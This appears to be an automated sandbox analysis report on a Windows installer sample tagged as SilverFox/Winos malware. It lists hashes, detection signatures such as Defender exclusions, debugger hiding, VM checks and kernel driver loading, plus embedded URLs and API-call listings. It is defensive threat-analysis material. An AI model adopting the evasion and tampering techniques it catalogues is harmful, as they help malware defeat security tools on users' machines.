Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
renamed because original name is a hash value
Original sample name: _1.0.4.exe
Analysis ID: 1579419
MD5: 44728e21199d2b04a4b25798625ac86e
SHA1: 382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256: 4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags: exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: Submited Sample Integrated Neural Analysis Model: Matched 86.6% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1801210662.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1800990919.0000000003840000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA598B0 FindFirstFileA,FindClose, 6_2_6CA598B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00386868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00386868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00387496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00387496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr String found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.dr Static PE information: section name: .j)q
Source: update.vac.6.dr Static PE information: section name: .j)q
Source: updat4.vac.6.dr Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA63F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, 6_2_6CA63F30
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3886
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3C62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3D18
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3D62
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E39CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8E3A6A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA64B80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E1950: CreateFileA,DeviceIoControl,CloseHandle, 6_2_6C8E1950
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, 6_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6C8E4754 6_2_6C8E4754
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA65863 6_2_6CA65863
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA60900 6_2_6CA60900
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAC4CE0 6_2_6CAC4CE0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB11D50 6_2_6CB11D50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA96EA1 6_2_6CA96EA1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB17E80 6_2_6CB17E80
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAB0EC9 6_2_6CAB0EC9
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0C810 6_2_6CB0C810
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB179F0 6_2_6CB179F0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB28930 6_2_6CB28930
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA96972 6_2_6CA96972
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0FAA0 6_2_6CB0FAA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB22AA0 6_2_6CB22AA0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0BAD0 6_2_6CB0BAD0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0DA50 6_2_6CB0DA50
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA9EBCA 6_2_6CA9EBCA
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAAEB66 6_2_6CAAEB66
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CAB340A 6_2_6CAB340A
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB10580 6_2_6CB10580
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB1D5C0 6_2_6CB1D5C0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB176E0 6_2_6CB176E0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA9A7CF 6_2_6CA9A7CF
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB37700 6_2_6CB37700
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB0E020 6_2_6CB0E020
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CB21750 6_2_6CB21750
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003C81EC 10_2_003C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039E00A 10_2_0039E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00400000 10_2_00400000
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004081C0 10_2_004081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00418240 10_2_00418240
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004022E0 10_2_004022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00422300 10_2_00422300
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041C3C0 10_2_0041C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004104C8 10_2_004104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003EE49F 10_2_003EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004025F0 10_2_004025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F8650 10_2_003F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FA6A0 10_2_003FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F66D0 10_2_003F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FC950 10_2_003FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D0943 10_2_003D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041E990 10_2_0041E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00402A80 10_2_00402A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003DAB11 10_2_003DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F8C20 10_2_003F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00406CE0 10_2_00406CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00410E00 10_2_00410E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00414EA0 10_2_00414EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003E10AC 10_2_003E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040D089 10_2_0040D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003EB121 10_2_003EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00411120 10_2_00411120
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004191C0 10_2_004191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FB180 10_2_003FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405180 10_2_00405180
